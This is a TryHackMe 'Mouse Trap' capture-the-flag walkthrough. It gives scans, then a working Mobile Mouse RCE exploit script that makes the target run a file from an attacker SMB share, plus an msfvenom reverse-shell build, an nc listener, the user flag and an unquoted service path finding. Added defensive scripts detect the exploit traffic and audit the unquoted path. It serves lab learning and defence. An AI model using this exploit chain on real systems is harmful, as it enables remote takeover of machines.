# Try Hack Me/Mouse Trap

#### **Try Hack Me / [Mouse Trap](https://tryhackme.com/room/mousetrap "Mouse Trap")**

by: alfreddgreat

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2024-11/scaled-1680-/CDUIQl90ZROwA44L-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2024-11/CDUIQl90ZROwA44L-image.png)

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/GQMkC4n9GGpXBQtn-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/GQMkC4n9GGpXBQtn-image.png)

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/fZHB8tYYaXo1txla-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/fZHB8tYYaXo1txla-image.png)

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/wmssfjxQvU5NXsBQ-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/wmssfjxQvU5NXsBQ-image.png)

root@ip-10-10-123-135:~# nmap -sS -sC -sV 10.10.162.0

```shell
root@ip-10-10-123-135:~# nmap -sS -sC -sV -O 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:19 BST
Nmap scan report for 10.10.162.0
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: MOUSETRAP
|   NetBIOS_Domain_Name: MOUSETRAP
|   NetBIOS_Computer_Name: MOUSETRAP
|   DNS_Domain_Name: MOUSETRAP
|   DNS_Computer_Name: MOUSETRAP
|   Product_Version: 10.0.17763
|_  System_Time: 2025-03-30T21:22:42+00:00
| ssl-cert: Subject: commonName=MOUSETRAP
| Not valid before: 2024-12-08T13:53:36
|_Not valid after: 2025-06-09T13:53:36
|_ssl-date: 2025-03-30T21:23:10+00:00; 0s from scanner time.
9099/tcp open  unknown
| fingerprint-strings:
|   FourOhFourRequest, GetRequest:
|     HTTP/1.0 200 OK
|     Server: Mobile Mouse Server
|     Content-Type: text/html
|     Content-Length: 326
|_    Success! The server running on "MOUSETRAP" was able to receive your request.
9999/tcp open  abyss?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.80%I=7%D=3/30%Time=67E9B591%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\
SF:x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x203
SF:26\r\n\r\nSuccess!
The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x
SF:20receive\x20your\x20request\.
\r\n")%r(FourOhFourRequ
SF:est,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20Se
SF:rver\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x20326\r\
SF:n\r\nSuccess!
The\
SF:x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x20rec
SF:eive\x20your\x20request\.
\r\n");
MAC Address: 02:23:36:E3:FF:87 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/30%OT=135%CT=1%CU=37501%PV=Y%DS=1%DC=D%G=Y%M=022336%
OS:TM=67E9B63F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=I%CI=I%II=
OS:I%SS=S%TS=U)OPS(O1=M5B4NW8NNS%O2=M5B4NW8NNS%O3=M5B4NW8%O4=M5B4NW8NNS%O5=
OS:M5B4NW8NNS%O6=M5B4NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF7
OS:0)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M5B4NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: MOUSETRAP, NetBIOS user: , NetBIOS MAC: 02:23:36:e3:ff:87 (unknown)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-03-30T21:22:42
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.34 seconds
```

root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0

```shell
root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:04 BST
Nmap scan report for 10.10.162.0
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp open  ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
9099/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
9999/tcp open  abyss
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:23:36:E3:FF:87 (Unknown)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 59.82 seconds
```

Opening port 9099 in the browser:

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/DAt6BwYBHH2k9y4A-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/DAt6BwYBHH2k9y4A-image.png)

In the first scan (the version scan), we see that a Mobile Mouse Server is running on port 9099.

Searching the internet for an exploit turns up the following GitHub repository:

https://github.com/blue0x1/mobilemouse-exploit?tab=readme-ov-file

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/vSlfbK1wRHhUCuNO-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/vSlfbK1wRHhUCuNO-image.png) [![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/hgZcjrTPWFEIje5y-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/hgZcjrTPWFEIje5y-image.png)

Using the V2 version: [CVE-2023-31902-v2.py](https://github.com/blue0x1/mobilemouse-exploit/blob/main/CVE-2023-31902-v2.py "CVE-2023-31902-v2.py")

```python
# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution v2
# Date: Apr 28, 2023
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 Enterprise LTSC Build 17763

#!/usr/bin/env python3

import socket
from time import sleep
import argparse
import threading
from impacket import smbserver


def smb_server(lhost, file_to_serve):
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare("share", ".", "")
    server.start()


help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File name to Upload", required=True)
parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")

args = parser.parse_args()

host = args.target
command_shell = args.file
lhost = args.lhost
port = 9099  # Default port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 256)
s.connect((host, port))

smb_server_thread = threading.Thread(target=smb_server, args=(lhost, command_shell))
smb_server_thread.start()

CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
run = s.recv(54)

RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
run = s.recv(54)

sleep(0.5)

payload = f"cmd.exe /c start /B \\\\{lhost}\\share\\{command_shell}".encode('utf-8')
hex_payload = payload.hex()
SHELL = bytearray.fromhex("4B45591E3130301E" + hex_payload + "1E04" + "4b45591e2d311e454e5445521e04")
s.send(SHELL)
shell = s.recv(96)

print("Take The rose...")

sleep(30)
s.close()
```
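For detection, the messages this script sends can be decoded from a capture of client-to-server traffic on port 9099. The following is an added example, not code from the write-up or the exploit repository: it assumes, from the byte strings in the script, that fields are separated by `0x1E` and messages end with `0x04`, and the function names, the alert rules and the placeholder command in the sample capture are constructed for illustration.

```python
import re

FIELD_SEP = b"\x1e"  # field separator seen in the script's byte strings
MSG_END = b"\x04"    # message terminator seen in the script's byte strings

# Constructed capture: the first two messages are the hex strings from the
# script; the KEY messages carry a placeholder command (192.0.2.10 and
# sample.exe are not values from the room).
CAPTURE = (
    bytes.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
    + bytes.fromhex("4b45591e3131341e721e4f505404")
    + b"KEY\x1e100\x1e" + rb"cmd.exe /c start /B \\192.0.2.10\share\sample.exe" + b"\x1e\x04"
    + b"KEY\x1e-1\x1eENTER\x1e\x04"
)

UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")  # matches \\host\share
SHELL_NAMES = ("cmd.exe", "powershell")


def parse_messages(stream):
    """Split a byte stream into messages, each a list of text fields."""
    return [
        [field.decode("latin-1") for field in raw.split(FIELD_SEP)]
        for raw in stream.split(MSG_END) if raw
    ]


def reasons(message):
    """Why a KEY message looks like a typed command rather than a keypress."""
    if message[0] != "KEY":
        return []
    text = " ".join(message[1:]).lower()
    found = [f"shell:{name}" for name in SHELL_NAMES if name in text]
    if UNC_PATH.search(text):
        found.append("unc-path")
    return found


def scan(stream):
    """Return (message, reasons) for every message that raises an alert."""
    hits = []
    for message in parse_messages(stream):
        why = reasons(message)
        if why:
            hits.append((message, why))
    return hits


if __name__ == "__main__":
    for message, why in scan(CAPTURE):
        print(why, message)
```
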

Save the code above to a file named **mousemobile.py**.

Now create a reverse shell executable using **msfvenom**, where `<IP>` is the IP of the local machine and `<PORT>` is the local port:

```shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
```

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/K11cy9Ka8BoVAAJ4-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/K11cy9Ka8BoVAAJ4-image.png)

We will run **mousemobile.py** with **shell-x64.exe** as the file to be executed.

Take note that shell-x64.exe has been created using port 446.

First, open a terminal and run the following command:

**nc -lnvp 446**

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/zXJkgOxjWAAtrfvY-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/zXJkgOxjWAAtrfvY-image.png)

Leave it open, then open another terminal and exploit the mouse application using the Python script.

**python3 mousemobile.py --target 10.10.162.0 --lhost 10.10.123.135 --file shell-x64.exe**

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/QHG4kY8IdiABAEJr-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/QHG4kY8IdiABAEJr-image.png)

The first terminal, where netcat is listening, should now show a connection.

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/G197xR3YtSvfW0Zj-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/G197xR3YtSvfW0Zj-image.png)

We now have a Windows command shell open.

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/npZD24LWuXGNJ9TI-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/npZD24LWuXGNJ9TI-image.png) [![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/liNjbiC8Zkac3lhE-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/liNjbiC8Zkac3lhE-image.png)

Get the flag from user.txt.

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/scaled-1680-/tH4Tr7vM1vt3BSVT-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-03/tH4Tr7vM1vt3BSVT-image.png)

**THM{Terry\_mouse\_2\_rce}**

#### Exploiting the Unquoted Path

Search for services with unquoted paths using the command below.

Using SharpUp.exe

```
C:\Users\purpletom>SharpUp.exe audit
SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.

=== Services with Unquoted Paths ===
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program' is modifable.
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files' is modifable.
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.
```

'C:\\Program Files (x86)\\Mobile Mouse\\Mouse' is modifable.
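The same finding can be audited and fixed from the defender's side. The following is an added example, not code from the write-up or from SharpUp: for each unquoted service `ImagePath` containing spaces it lists the prefixes that Windows tries as a program name before reaching the intended executable, the directories whose ACLs therefore need review, and the quoted path that removes the ambiguity. The service table is constructed (only the first entry comes from the output above) and the function names are illustrative.

```python
import ntpath

# Constructed sample: service name -> ImagePath as stored for the service.
# The first entry is the path SharpUp reported above; the other two are
# hypothetical services added for contrast.
SERVICES = {
    "Mobile Mouse Service": r"C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe",
    "Quoted Example": r'"C:\Program Files\Example App\svc.exe" -k run',
    "No Spaces Example": r"C:\Windows\System32\svchost.exe -k netsvcs",
}


def executable_part(image_path):
    """Cut an unquoted command line after the first '.exe' to drop arguments."""
    end = image_path.lower().find(".exe")
    return image_path if end == -1 else image_path[: end + 4]


def ambiguous_prefixes(image_path):
    """Prefixes of an unquoted path that end at a space; each one is tried
    as a program name before the full path is reached."""
    path = image_path.strip()
    if path.startswith('"'):
        return []  # quoted paths are parsed unambiguously
    words = executable_part(path).split(" ")
    return [" ".join(words[:i]) for i in range(1, len(words))]


def audit(services):
    """Per affected service: prefixes, directories to ACL-check, quoted fix."""
    report = {}
    for name, image_path in services.items():
        prefixes = ambiguous_prefixes(image_path)
        if not prefixes:
            continue
        path = image_path.strip()
        exe = executable_part(path)
        report[name] = {
            "prefixes": prefixes,
            "review_acl": sorted({ntpath.dirname(p) for p in prefixes}),
            "fixed_image_path": f'"{exe}"' + path[len(exe):],
        }
    return report


if __name__ == "__main__":
    for name, finding in audit(SERVICES).items():
        print(name, finding)
```

The script does not read ACLs itself; the `review_acl` directories are the ones to check for write access by non-administrative users.
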